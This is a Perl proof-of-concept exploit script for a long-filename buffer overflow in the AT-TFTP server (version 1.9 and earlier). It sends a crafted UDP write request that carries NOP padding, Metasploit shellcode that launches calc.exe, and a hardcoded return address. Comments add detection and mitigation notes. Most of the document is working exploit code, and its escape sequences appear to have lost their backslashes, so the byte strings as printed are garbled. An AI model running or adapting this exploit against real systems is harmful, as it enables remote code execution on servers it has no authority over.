
# Title : AT-TFTP <= 1.9 (Long Filename) Remote Buffer Overflow Exploit
# Published : 2006-12-03
# Author : Jacopo Cervini


#!/usr/bin/perl -w
#acaro[at]jervus.it
#http://www.securityfocus.com/bid/21320
#
# liuqx@nipc.org.cn is credited with the discovery of this vulnerability
#
# Proof-of-concept for the AT-TFTP <= 1.9 long-filename overflow (BID 21320).
# The script sends one UDP datagram shaped like a TFTP write request
# (opcode 2, RFC 1350) whose filename field carries padding, a payload and
# a return-address value instead of a short NUL-terminated name.
#
# Defensive notes:
#  - Detection: a TFTP request whose filename field is hundreds of bytes
#    long (here 63 + 164 + 4 bytes, per the sizes noted below) is anomalous;
#    RFC 1350 filenames are short NUL-terminated strings.
#  - Mitigation: run a version newer than 1.9 and do not expose UDP/69
#    beyond the hosts that actually need it.



use IO::Socket;

# Usage check: only the port argument ($ARGV[1]) is tested. A present port
# with a missing host falls through to the socket constructor's die below.
if(!($ARGV[1]))
{
 print "Uso: atftp-19.pl <victim> <port>nn";
 exit;
}



# Connected UDP socket to <victim>:<port>; IO::Socket::INET associates the
# peer so that a plain print on the handle emits the datagram.
$victim = IO::Socket::INET->new(Proto=>'udp',
                                PeerAddr=>$ARGV[0],
                                PeerPort=>$ARGV[1])
                            or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
# Padding placed ahead of the payload: 63 repetitions of the literal below.
$pad = "x90"x63;

# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
# Payload as produced by the Metasploit generator named above (164 bytes);
# its stated effect is launching calc.exe, i.e. a visible-but-harmless
# demonstration rather than a remote shell.

$shellcode = "x33xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xf1".
"xf1x59x06x83xebxfcxe2xf4x0dx19x1dx06xf1xf1xd2x43".
"xcdx7ax25x03x89xf0xb6x8dxbexe9xd2x59xd1xf0xb2x4f".
"x7axc5xd2x07x1fxc0x99x9fx5dx75x99x72xf6x30x93x0b".
"xf0x33xb2xf2xcaxa5x7dx02x84x14xd2x59xd5xf0xb2x60".
"x7axfdx12x8dxaexedx58xedx7axedxd2x07x1ax78x05x22".
"xf5x32x68xc6x95x7ax19x36x74x31x21x0ax7axb1x55x8d".
"x81xedxf4x8dx99xf9xb2x0fx7ax71xe9x06xf1xf1xd2x6e".
"xcdxaex68xf0x91xa7xd0xfex72x31x22x56x99x01xd3x02".
"xaex99xc1xf8x7bxffx0exf9x16x92x38x6ax92xdfx3cx7e".
"x94xf1x59x06";

# Return-address value written past the filename buffer. The commented-out
# line is a placeholder left from development; the live value is tied to one
# specific OS build and locale (see trailing comment), so the PoC is not
# portable across installations.
#$eip="x42x42x42x42";
$eip="xf4xf5xe3x75";	#call [ESP+28] in IMM32.dll on win2k Server SP4 Italian 



# TFTP transfer mode field that follows the filename in a WRQ.
$mode = "netascii";

# Request layout: [opcode 0x0002][filename = pad . shellcode . eip][mode].
# In a well-formed WRQ the filename and mode are each NUL-terminated; the
# overflow is entirely in the oversized filename field.
$exploit = "x00x02" . $pad . $shellcode . $eip . ""  . $mode . "";


# One datagram is sent; no reply is read, so success is not observable here.
print $victim $exploit;

print " + Malicious request sent ...n";

# Short pause before exit; nothing is awaited on the socket during it.
sleep(2);

print "Done.n";

close($victim);
exit;
